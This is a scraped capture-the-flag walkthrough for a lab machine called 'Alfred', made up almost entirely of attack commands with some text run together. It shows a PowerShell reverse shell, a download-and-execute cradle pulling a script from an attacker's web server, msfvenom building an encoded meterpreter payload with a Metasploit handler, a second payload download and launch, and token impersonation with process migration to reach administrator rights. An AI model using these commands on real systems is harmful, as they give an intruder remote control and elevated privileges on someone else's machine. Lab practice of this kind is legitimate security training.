Alfred
Initial Access
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.135.134 -Port 4444nmap -A 10.10.98.134rlwrap nc -lvnp 4444




Switching Shells

Privilege Escalation



Last updated
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.135.134 -Port 4444nmap -A 10.10.98.134rlwrap nc -lvnp 4444








Last updated
powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.135.134:81/Invoke-PowerShellTcp.ps1');
Invoke-PowerShellTcpmsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.10.135.134 LPORT=1337 -f exe -o shell.exe
python2 -m SimpleHTTPServer 81msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.135.134
set LPORT 1337
runpowershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.8.234:81/shells.exe','shells.exe')"
Start-Process "shell.exe"load incognito
list_tokens -gimpersonate_token "BUILTIN\Administrators"
getuidps
migrate 668